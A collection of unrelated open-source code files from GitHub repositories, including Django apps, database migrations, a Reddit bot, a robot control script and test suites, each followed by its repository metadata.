batchnum = self.curr_batchnum
return os.path.join(self.data_dir, 'data_batch_%d' % batchnum)
@classmethod
def get_instance(cls, data_dir,
img_size, num_colors, # options i've add to cifar data provider
batch_range=None, init_epoch=1, init_batchnum=None, type="default", dp_params={}, test=False):
# why the fuck can't i reference DataProvider in the original definition?
#cls.dp_classes['default'] = DataProvider
type = type or DataProvider.get_batch_meta(data_dir)['dp_type'] # allow data to decide data provider
if type.startswith("dummy-"):
name = "-".join(type.split('-')[:-1]) + "-n"
if name not in dp_types:
raise DataProviderException("No such data provider: %s" % type)
_class = dp_classes[name]
dims = int(type.split('-')[-1])
return _class(dims)
elif type in dp_types:
if img_size == 0:
_class = dp_classes[type]
return _class(data_dir, batch_range, init_epoch, init_batchnum, dp_params, test)
else :
_class = dp_classes[type]
return _class(data_dir, img_size, num_colors,
batch_range, init_epoch, init_batchnum, dp_params, test)
raise DataProviderException("No such data provider: %s" % type)
@classmethod
def register_data_provider(cls, name, desc, _class):
if name in dp_types:
raise DataProviderException("Data provider %s already registered" % name)
dp_types[name] = desc
dp_classes[name] = _class
@staticmethod
def get_batch_meta(data_dir):
return unpickle(os.path.join(data_dir, BATCH_META_FILE))
@staticmethod
def get_batch_filenames(srcdir):
return sorted([f for f in os.listdir(srcdir) if DataProvider.BATCH_REGEX.match(f)], key=alphanum_key)
@staticmethod
def get_batch_nums(srcdir):
names = DataProvider.get_batch_filenames(srcdir)
return sorted(list(set(int(DataProvider.BATCH_REGEX.match(n).group(1)) for n in names)))
@staticmethod
def get_num_batches(srcdir):
return len(DataProvider.get_batch_nums(srcdir))
class DummyDataProvider(DataProvider):
def __init__(self, data_dim):
#self.data_dim = data_dim
self.batch_range = [1]
self.batch_meta = {'num_vis': data_dim, 'data_in_rows':True}
self.curr_epoch = 1
self.curr_batchnum = 1
self.batch_idx = 0
def get_next_batch(self):
epoch, batchnum = self.curr_epoch, self.curr_batchnum
self.advance_batch()
data = rand(512, self.get_data_dims()).astype(n.single)
return self.curr_epoch, self.curr_batchnum, {'data':data}
class LabeledDummyDataProvider(DummyDataProvider):
def __init__(self, data_dim, num_classes=10, num_cases=512):
#self.data_dim = data_dim
self.batch_range = [1]
self.batch_meta = {'num_vis': data_dim,
'label_names': [str(x) for x in range(num_classes)],
'data_in_rows':True}
self.num_cases = num_cases
self.num_classes = num_classes
self.curr_epoch = 1
self.curr_batchnum = 1
self.batch_idx=0
def get_num_classes(self):
return self.num_classes
def get_next_batch(self):
epoch, batchnum = self.curr_epoch, self.curr_batchnum
self.advance_batch()
data = rand(self.num_cases, self.get_data_dims()).astype(n.single) # <--changed to rand
labels = n.require(n.c_[random_integers(0,self.num_classes-1,self.num_cases)], requirements='C', dtype=n.single)
return self.curr_epoch, self.curr_batchnum, {'data':data, 'labels':labels}
class MemoryDataProvider(DataProvider):
def __init__(self, data_dir, batch_range, init_epoch=1, init_batchnum=None, dp_params=None, test=False):
DataProvider.__init__(self, data_dir, batch_range, init_epoch, init_batchnum, dp_params, test)
self.data_dic = []
for i in self.batch_range:
self.data_dic += [self.get_batch(i)]
def get_next_batch(self):
epoch, batchnum = self.curr_epoch, self.curr_batchnum
self.advance_batch()
return epoch, batchnum, self.data_dic[batchnum - self.batch_range[0]]
class LabeledDataProvider(DataProvider):
def __init__(self, data_dir, batch_range=None, init_epoch=1, init_batchnum=None, dp_params={}, test=False):
DataProvider.__init__(self, data_dir, batch_range, init_epoch, init_batchnum, dp_params, test)
def get_num_classes(self):
return len(self.batch_meta['label_names'])
class LabeledMemoryDataProvider(LabeledDataProvider):
def __init__(self, data_dir, batch_range, init_epoch=1, init_batchnum=None, dp_params={}, test=False):
LabeledDataProvider.__init__(self, data_dir, batch_range, init_epoch, init_batchnum, dp_params, test)
self.data_dic = []
for i in batch_range:
self.data_dic += [unpickle(self.get_data_file_name(i))]
self.data_dic[-1]["labels"] = n.c_[n.require(self.data_dic[-1]['labels'], dtype=n.single)]
def get_next_batch(self):
epoch, batchnum = self.curr_epoch, self.curr_batchnum
self.advance_batch()
bidx = batchnum - self.batch_range[0]
return epoch, batchnum, self.data_dic[bidx]
dp_types = {"default": "The default data provider; loads one batch into memory at a time",
"memory": "Loads the entire dataset into memory",
"labeled": "Returns data and labels (used by classifiers)",
"labeled-memory": "Combination labeled + memory",
"dummy-n": "Dummy data provider for n-dimensional data",
"dummy-labeled-n": "Labeled dummy data provider for n-dimensional data"}
dp_classes = {"default": DataProvider,
"memory": MemoryDataProvider,
"labeled": LabeledDataProvider,
"labeled-memory": LabeledMemoryDataProvider,
"dummy-n": DummyDataProvider,
"dummy-labeled-n": LabeledDummyDataProvider}
class DataProviderException(Exception):
pass
|
{
"content_hash": "7f12a640a043196552a16a9de74d456b",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 120,
"avg_line_length": 42.57142857142857,
"alnum_prop": 0.6018618748646893,
"repo_name": "olivernina/idropout",
"id": "7899ca8fabd56619a55db60cfade70aea3fa2b85",
"size": "10604",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "data.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "12845"
},
{
"name": "C++",
"bytes": "2178507"
},
{
"name": "Cuda",
"bytes": "913861"
},
{
"name": "Python",
"bytes": "198063"
},
{
"name": "Shell",
"bytes": "8500"
}
],
"symlink_target": ""
}
|
from django.contrib.auth.decorators import login_required
from django.urls import path
from django.utils.translation import gettext_lazy as _
from oscar.core.application import OscarConfig
from oscar.core.loading import get_class
class CatalogueReviewsConfig(OscarConfig):
label = 'reviews'
name = 'oscar.apps.catalogue.reviews'
verbose_name = _('Catalogue reviews')
hidable_feature_name = 'reviews'
def ready(self):
self.detail_view = get_class('catalogue.reviews.views', 'ProductReviewDetail')
self.create_view = get_class('catalogue.reviews.views', 'CreateProductReview')
self.vote_view = get_class('catalogue.reviews.views', 'AddVoteView')
self.list_view = get_class('catalogue.reviews.views', 'ProductReviewList')
def get_urls(self):
urls = [
path('<int:pk>/', self.detail_view.as_view(), name='reviews-detail'),
path('add/', self.create_view.as_view(), name='reviews-add'),
path('<int:pk>)/vote/', login_required(self.vote_view.as_view()), name='reviews-vote'),
path('', self.list_view.as_view(), name='reviews-list'),
]
return self.post_process_urls(urls)
|
{
"content_hash": "8feffabd5f827953efd02fb2bf247d7e",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 99,
"avg_line_length": 41.275862068965516,
"alnum_prop": 0.6691729323308271,
"repo_name": "solarissmoke/django-oscar",
"id": "521582e54912ea61a1580bc84c21aa31f72381a7",
"size": "1197",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/oscar/apps/catalogue/reviews/apps.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "529"
},
{
"name": "HTML",
"bytes": "562906"
},
{
"name": "JavaScript",
"bytes": "40879"
},
{
"name": "Makefile",
"bytes": "4234"
},
{
"name": "Python",
"bytes": "2199293"
},
{
"name": "SCSS",
"bytes": "21362"
},
{
"name": "Shell",
"bytes": "308"
}
],
"symlink_target": ""
}
|
"""List all tasks for your Organization via the GCI API."""
import argparse
import re
import client as gciclient
argparser = argparse.ArgumentParser(description='GCI CSV Task Uploader.')
argparser.add_argument('--apikey', type=str, nargs='?', required=True,
help='api key')
argparser.add_argument('--url', type=str, nargs='?',
default='https://codein.withgoogle.com',
help='server url')
argparser.add_argument('--debug', action='store_true',
help='enable debug request logging')
FLAGS = argparser.parse_args()
def main():
client = gciclient.GCIAPIClient(
auth_token=FLAGS.apikey,
url_prefix=FLAGS.url,
debug=FLAGS.debug)
next_page = 1
while next_page > 0:
tasks = client.ListTasks(page=next_page)
for t in tasks['results']:
print '\t'.join([str(t['id']), t['name']])
next_page = 0
if tasks['next']:
result = re.search(r'page=(\d+)', tasks['next'])
if result:
next_page = result.group(1)
if __name__ == '__main__':
main()
|
{
"content_hash": "007e745d41b5d9f12cf5021df86e4f43",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 73,
"avg_line_length": 26.634146341463413,
"alnum_prop": 0.5952380952380952,
"repo_name": "Freso/google-codein-api",
"id": "0bdf9c8b4f020a218873699ab5d66f7068cd7ef2",
"size": "1707",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "list_tasks.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "11490"
}
],
"symlink_target": ""
}
|
import django.contrib.postgres.fields.jsonb
import django.db.models.deletion
import oauthlib.common
from django.db import migrations, models
import saleor.core.utils.json_serializer
def update_contentypes(apps, schema_editor):
"""Update content types.
We want to have the same content type id, when the model is moved.
"""
ContentType = apps.get_model("contenttypes", "ContentType")
db_alias = schema_editor.connection.alias
# Move the ServiceAccount to app module
qs = ContentType.objects.using(db_alias).filter(app_label="account", model="app")
qs.update(app_label="app")
# Move the ServiceAccountToken to app module
qs = ContentType.objects.using(db_alias).filter(
app_label="account", model="apptoken"
)
qs.update(app_label="app")
def update_contentypes_reverse(apps, schema_editor):
"""Revert changes in content types."""
ContentType = apps.get_model("contenttypes", "ContentType")
db_alias = schema_editor.connection.alias
qs = ContentType.objects.using(db_alias).filter(app_label="app", model="app")
qs.update(app_label="account")
qs = ContentType.objects.using(db_alias).filter(app_label="app", model="apptoken")
qs.update(app_label="account")
def convert_service_account_permissions_to_app_permissions(apps, schema_editor):
Permission = apps.get_model("auth", "Permission")
service_account_permission = Permission.objects.filter(
codename="manage_service_accounts", content_type__app_label="app"
).first()
if service_account_permission:
service_account_permission.codename = "manage_apps"
service_account_permission.name = "Manage apps"
service_account_permission.save()
class Migration(migrations.Migration):
initial = True
dependencies = [
("auth", "0011_update_proxy_permissions"),
("account", "0044_unmount_app_and_app_token"),
]
state_operations = [
migrations.CreateModel(
name="App",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=60)),
("created", models.DateTimeField(auto_now_add=True)),
("is_active", models.BooleanField(default=True)),
(
"permissions",
models.ManyToManyField(
blank=True,
help_text="Specific permissions for this app.",
related_name="app_set",
related_query_name="app",
to="auth.Permission",
),
),
(
"metadata",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=saleor.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
(
"private_metadata",
django.contrib.postgres.fields.jsonb.JSONField(
blank=True,
default=dict,
encoder=saleor.core.utils.json_serializer.CustomJsonEncoder,
null=True,
),
),
],
options={
"db_table": "app_app",
"ordering": ("name", "pk"),
"permissions": (("manage_apps", "Manage apps"),),
},
),
migrations.CreateModel(
name="AppToken",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(blank=True, default="", max_length=128)),
(
"auth_token",
models.CharField(
default=oauthlib.common.generate_token,
max_length=30,
unique=True,
),
),
(
"app",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="tokens",
to="app.App",
),
),
],
options={"db_table": "app_apptoken"},
),
]
database_operations = [
migrations.RunPython(update_contentypes, update_contentypes_reverse),
]
operations = [
migrations.SeparateDatabaseAndState(
state_operations=state_operations, database_operations=database_operations
),
migrations.AlterModelTable(
name="app",
table=None,
),
migrations.AlterModelTable(
name="apptoken",
table=None,
),
migrations.RunPython(convert_service_account_permissions_to_app_permissions),
]
|
{
"content_hash": "e3a7fb662270f3671e4675ed91d62f87",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 86,
"avg_line_length": 34.06211180124224,
"alnum_prop": 0.49671772428884026,
"repo_name": "mociepka/saleor",
"id": "df94e1c957b59257017b8a07918e01c6a24b1d4c",
"size": "5533",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "saleor/app/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "2228"
},
{
"name": "HTML",
"bytes": "249248"
},
{
"name": "Procfile",
"bytes": "290"
},
{
"name": "Python",
"bytes": "12686831"
},
{
"name": "Shell",
"bytes": "439"
}
],
"symlink_target": ""
}
|
import random
import time
from utils import SupplyResult
from utils.tech import get_active_period, get_newly_active, get_all_public_channels, get_all_tags
from utils.tech import generate_list_of_channels, get_top_growers_for_last_week, default_ending
from utils.tech import chunker
subreddit = 'all'
t_channel = '@reddit2telegram'
def send_post(submission, r2t):
channels_list = get_all_public_channels(r2t)
newly_active = get_newly_active(r2t, channels_list)
top_growers = get_top_growers_for_last_week(r2t, channels_list)
text_to_send = '<b>Weekend news</b>\n\n'
if len(newly_active) > 0:
text_to_send += '🎉 Welcome to newly active channels: {channels_list}. 🎈🎈\n\n'.format(channels_list=', '.join(newly_active))
text_to_send += '🏆 Channel of the week: {channel_name}. Join and enjoy!\n\n'.format(channel_name=random.choice(channels_list))
if len(top_growers) > 0:
text_to_send += '🔥 Hottest channels of the week: {channels}.\n\n'.format(channels=', '.join(top_growers))
list_of_channels = generate_list_of_channels(channels_list, random_permutation=False)
text_to_send += default_ending()
r2t.send_text(text_to_send, parse_mode='HTML')
time.sleep(2)
text_to_send = '⬇️ All active channels:\n'
for l in chunker(list_of_channels, 100):
text_to_send += '\n'.join(l)
r2t.send_text(text_to_send)
text_to_send = ''
time.sleep(2)
# Without tags, as it gets annoying
# text_to_send = '#️⃣ All tags:\n'
# list_of_tags = list(get_all_tags())
# # random.shuffle(list_of_tags)
# text_to_send += ' '.join(sorted(list_of_tags))
# r2t.send_text(text_to_send, parse_mode='HTML')
# It's not a proper supply, so just stop.
return SupplyResult.STOP_THIS_SUPPLY
|
{
"content_hash": "3edfa7a03b43728e960cee99c20d36fc",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 131,
"avg_line_length": 42.45238095238095,
"alnum_prop": 0.6674144699943915,
"repo_name": "Fillll/reddit2telegram",
"id": "e1cc820b8e3bf4e56502c92f4ad988731c6896a4",
"size": "1823",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reddit2telegram/channels/tech_weekly_radar/app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "301463"
},
{
"name": "Shell",
"bytes": "153"
}
],
"symlink_target": ""
}
|
from oslo_config import cfg
from magnum.i18n import _
docker_registry_group = cfg.OptGroup(name='docker_registry',
title='Options for Docker Registry')
docker_registry_opts = [
cfg.StrOpt('swift_region',
help=_('Region name of Swift')),
cfg.StrOpt('swift_registry_container',
default='docker_registry',
help=_('Name of the container in Swift which docker registry '
'stores images in'))
]
def register_opts(conf):
conf.register_group(docker_registry_group)
conf.register_opts(docker_registry_opts, group=docker_registry_group)
def list_opts():
return {
docker_registry_group: docker_registry_opts
}
|
{
"content_hash": "3e2fc781b645baf08a14c2a240f30546",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 77,
"avg_line_length": 28.53846153846154,
"alnum_prop": 0.6199460916442049,
"repo_name": "openstack/magnum",
"id": "36b27f5506a403323125a51053192c1fdcef3fc9",
"size": "1286",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "magnum/conf/docker_registry.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "8788"
},
{
"name": "Mako",
"bytes": "349"
},
{
"name": "Python",
"bytes": "2302791"
},
{
"name": "Shell",
"bytes": "547968"
}
],
"symlink_target": ""
}
|
from pyNIBE import pyNIBE
|
{
"content_hash": "84201217079d55e129148c5bbf70ac91",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 25,
"avg_line_length": 25,
"alnum_prop": 0.88,
"repo_name": "hypokondrickard/pyNIBE",
"id": "f3f8caa6f7ce5a9e5d25ec110251e4022340ccce",
"size": "25",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyNIBE/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5213"
}
],
"symlink_target": ""
}
|
from finch import Finch
from time import sleep
# Instantiate the Finch object and connect to Finch
tweety = Finch()
# Get the Z-Axis acceleration
zAccel = tweety.acceleration()[2]
# Do the following while the Finch is not upside down (z value in gees above -0.7)
while zAccel > -0.7:
left_obstacle, right_obstacle = tweety.obstacle()
# If there's an obstacle on the left, back up and arc
if left_obstacle:
tweety.led(255,0,0)
tweety.wheels(-0.3,-1.0)
sleep(1.0)
# Back up and arc in the opposite direction if there's something on the right
elif right_obstacle:
tweety.led(255,255,0)
tweety.wheels(-1.0, -0.3)
sleep(1.0)
# Else just go straight
else:
tweety.wheels(1.0, 1.0)
tweety.led(0,255,0)
# Keep reading in the Z acceleration
zAccel = tweety.acceleration()[2]
tweety.close()
|
{
"content_hash": "9046317b9c234689c85971003e0f624d",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 82,
"avg_line_length": 28.806451612903224,
"alnum_prop": 0.6461366181410975,
"repo_name": "Amanda1223/Finch",
"id": "2928a1429e7d1b1ad3a9b32448632bf6199b6003",
"size": "947",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "wanderer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "76057"
}
],
"symlink_target": ""
}
|
import os
from setuptools import setup, find_packages
__version__ = None
exec(open('cabby/_version.py').read())
def here(*path):
return os.path.join(os.path.dirname(__file__), *path)
def get_file_contents(filename):
with open(here(filename)) as fp:
return fp.read()
# This is a quick and dirty way to include everything from
# requirements.txt as package dependencies.
install_requires = get_file_contents('requirements.txt').split()
setup(
name="cabby",
description="TAXII client library",
long_description=get_file_contents('README.rst'),
url="https://github.com/EclecticIQ/cabby/",
author="EclecticIQ",
author_email="cabby@eclecticiq.com",
version=__version__,
license="BSD License",
packages=find_packages(exclude=['tests']),
entry_points={
'console_scripts': [
'taxii-proxy=cabby.cli:proxy_content',
'taxii-poll=cabby.cli:poll_content',
'taxii-push=cabby.cli:push_content',
'taxii-discovery=cabby.cli:discover_services',
'taxii-collections=cabby.cli:fetch_collections',
'taxii-subscription=cabby.cli:manage_subscription',
]
},
install_requires=install_requires,
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Information Technology",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4",
"Topic :: Internet",
"Topic :: Security",
"Topic :: Software Development :: Libraries :: Python Modules"
]
)
|
{
"content_hash": "f63a9d8a9d0616c9eeeeb041f6e109f8",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 70,
"avg_line_length": 31.703703703703702,
"alnum_prop": 0.6325934579439252,
"repo_name": "Intelworks/cabby",
"id": "0fdfb0c4b1e7e8e4b036688149a3114d28b55487",
"size": "1712",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "142794"
}
],
"symlink_target": ""
}
|
"""
persistlab.testsuite.measfile
~~~~~~~~~~~~~
This module tests the data file parsing.
:copyright: (c) 2013 by Stephane Henry..
:license: BSD, see LICENSE for more details.
"""
import sys
import unittest
import pandas
import pandas as pd
import numpy as np
from persistlab import measfile
from persistlab import data
def dataframe():
index = ['a', 'b', 'c', 'd', 'e']
columns = ['one', 'two', 'three', 'four']
M = pd.DataFrame(np.random.randn(5,4), index=index, columns=columns)
return M
class Selection(unittest.TestCase):
def setUp(self, df=dataframe()):
self.df = df
self.all = range(len(df.columns))
def add(self, attr, res):
selection = measfile.Selection(self.df, [])
selection.add(attr)
self.assertEqual(selection, res)
def drop(self, attr, res):
selection = measfile.Selection(self.df)
selection.drop(attr)
self.assertEqual(selection, res)
def test_droplist(self):
self.drop([0, 5], [1, 2, 3])
def test_dropint(self):
self.drop(0, [1, 2, 3])
def test_add_int(self):
self.add(0, [0])
def test_add_list(self):
self.add([0, 1], [0, 1])
def test_add_non_existing(self):
self.add(range(-3, 5), range(4))
def test_selectall(self):
selection = measfile.Selection(self.df)
self.assertEqual(selection, self.all)
class FlatFile(unittest.TestCase):
def setUp(self):
self.mf = measfile.FlatFile(data.FLATFILE_1)
def test_parse(self):
# Check shape of the data
self.assertEqual(self.mf.df.shape, (3, 4))
class XSeg(unittest.TestCase):
def test_no_segment_selection(self):
mf = measfile.XSegFile(data.LI_FN_XSEG[0])
# Test shape
self.assertEqual(mf.df.shape, (320, 3))
# Test one value
self.assertEqual(mf.df.ix[0][1] , 3.388e-09)
def test_oneseg(self):
mf = measfile.XSegFile(data.LI_FN_XSEG[0], data_segment_range=[1])
self.assertEqual(mf.df.shape, (80, 3))
def test_twoseg(self):
mf = measfile.XSegFile(data.LI_FN_XSEG[0], data_segment_range=[0, 1])
self.assertEqual(mf.df.shape, (160, 3))
def test_threeseg(self):
mf = measfile.XSegFile(data.LI_FN_XSEG[0], data_segment_range=[1, 3])
self.assertEqual(mf.df.shape, (240, 3))
class DataFileParser(unittest.TestCase):
def setUp(self):
dfp = measfile.DataFileParser()
self.limf = dfp.parse_files(data.LI_FLATFILE_ALL)
def test_set_filetype(self):
self.assertIsNotNone(self.limf[0])
def test_parse_files(self):
self.assertEqual(len(self.limf),3)
class DataProcessor(DataFileParser):
def test_process(self):
dp = measfile.DataProcessor()
stats = dp.compute(self.limf, data_process='trapz')
self.assertIsInstance(stats,pandas.DataFrame)
|
{
"content_hash": "035a008d5dc24963ca7e15732262b16c",
"timestamp": "",
"source": "github",
"line_count": 115,
"max_line_length": 78,
"avg_line_length": 26.08695652173913,
"alnum_prop": 0.6016666666666667,
"repo_name": "ushiro/persistlab",
"id": "b2a8e7872adb09350c5aa99ef1358fa6b101cd9b",
"size": "3022",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "persistlab/testsuite/test_measfile.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "83815"
},
{
"name": "Shell",
"bytes": "256"
}
],
"symlink_target": ""
}
|
def base36encode(number, alphabet='0123456789abcdefghijklmnopqrstuvwxyz'):
"""Converts an integer to a base36 string."""
if not isinstance(number, (int)):
raise TypeError('number must be an integer')
base36 = ''
sign = ''
if number < 0:
sign = '-'
number = -number
if 0 <= number < len(alphabet):
return sign + alphabet[number]
while number != 0:
number, i = divmod(number, len(alphabet))
base36 = alphabet[i] + base36
return sign + base36
def base36decode(number):
return int(number, 36)
def b36(i):
if type(i) == int:
return base36encode(i)
if type(i) == str:
return base36decode(i)
import praw
PREFIX = 't3_'
def get_new(r):
subreddit = r.get_subreddit('all')
newestitem = next(subreddit.get_new())
newestitem = b36(newestitem.id)
while True:
window = list(range(newestitem, newestitem+100))
window = [PREFIX + b36(i) for i in window]
#print(window[0], window[-1])
try:
items = list(r.get_submissions(fullnames=window))
except praw.errors.NotFound:
items = None
r.evict(r.config['by_id'])
if items is None:
continue
for item in items:
newestitem = b36(item.id) + 1
yield item
|
{
"content_hash": "5c731e447b8b6b657dab8ae8aca3d75b",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 74,
"avg_line_length": 26.822222222222223,
"alnum_prop": 0.6412593206296603,
"repo_name": "iAmMrinal0/reddit",
"id": "8d91a81c6c72b89e6676771cc0c16e6483ddd829",
"size": "1207",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "BetterNew/betternew.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "289"
},
{
"name": "HTML",
"bytes": "1078988"
},
{
"name": "PostScript",
"bytes": "260030"
},
{
"name": "Python",
"bytes": "546110"
}
],
"symlink_target": ""
}
|
from training_data_generator.scripts.analyzer import analyze_morph
def tagging(l, r, ne, ylabel):
for i in range(l, r):
prefix = 'B' if i == l else 'I'
ylabel[i] = prefix + '-' + ne
def matching(sentence, ne_list):
def get_word_pos_list(sentence, ne_list):
word_pos_list = []
searched_pos = 0
for nw, ne in ne_list:
nw = ''.join(nw.split(' '))
idx = sentence.index(nw, searched_pos)
searched_pos = idx + len(nw)
word_pos_list.append((idx, searched_pos))
return word_pos_list
def get_morph_pos_list(wakati, word_pos_list):
morph_pos_list = []
for start_pos, end_pos in word_pos_list:
ch_cnt = 0
morph_pos = []
for i, morph in enumerate(wakati):
if ch_cnt < start_pos:
ch_cnt += len(morph)
elif ch_cnt < end_pos:
morph_pos.append(i)
ch_cnt += len(morph)
else:
break
morph_pos_list.append(morph_pos)
return morph_pos_list
def tagging(morph_pos_list, ne_list, ylabel):
for i in range(len(ne_list)):
nw, ne = ne_list[i]
morph_pos = morph_pos_list[i]
for j, k in enumerate(morph_pos):
prefix = 'B' if j == 0 else 'I'
ylabel[k] = prefix + '-' + ne
wakati, features = analyze_morph(sentence)
sentence = ''.join(sentence.split(' '))
word_pos_list = get_word_pos_list(sentence, ne_list)
morph_pos_list = get_morph_pos_list(wakati, word_pos_list)
ylabel = ['O'] * len(wakati)
tagging(morph_pos_list, ne_list, ylabel)
labeled_sent = []
for i in range(len(wakati)):
tmp = []
tmp.append(wakati[i])
tmp.extend(features[i].split(','))
tmp.append(ylabel[i])
labeled_sent.append(tmp)
# Error
for word_pos, morph_pos in zip(word_pos_list, morph_pos_list):
start_pos, end_pos = word_pos
word1, word2 = sentence[start_pos: end_pos], ''.join([wakati[i] for i in morph_pos])
if word1 != word2:
print(word1, word2)
return labeled_sent
if __name__ == '__main__':
sent = '中華がいい'
ne_list = [['中華', 'GENRE']]
labeled_sent = matching(sent, ne_list)
for morph in labeled_sent:
print(','.join(morph))
|
{
"content_hash": "78d6da74ff4e5c2ffcca8388dde49162",
"timestamp": "",
"source": "github",
"line_count": 80,
"max_line_length": 92,
"avg_line_length": 30.225,
"alnum_prop": 0.5268817204301075,
"repo_name": "Hironsan/HotPepperGourmetDialogue",
"id": "aebb4d526f524e5238b818ffed469716560c7446",
"size": "2456",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "training_data_generator/scripts/matching.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "26365"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('builder', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='UserDetails',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, primary_key=True, auto_created=True)),
('sites', models.ManyToManyField(related_name='admins', to='builder.Site')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL, related_name='details')),
],
options={
'verbose_name': 'Detail',
'verbose_name_plural': 'Details',
},
),
]
|
{
"content_hash": "60dbe0de60f626d02263abbdb1f1cb87",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 114,
"avg_line_length": 31.962962962962962,
"alnum_prop": 0.578215527230591,
"repo_name": "istrategylabs/franklin-api",
"id": "21479d3ffeb9676998f62894df8513f851c1244c",
"size": "887",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "franklin/users/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1249"
},
{
"name": "Python",
"bytes": "87738"
},
{
"name": "Shell",
"bytes": "539"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.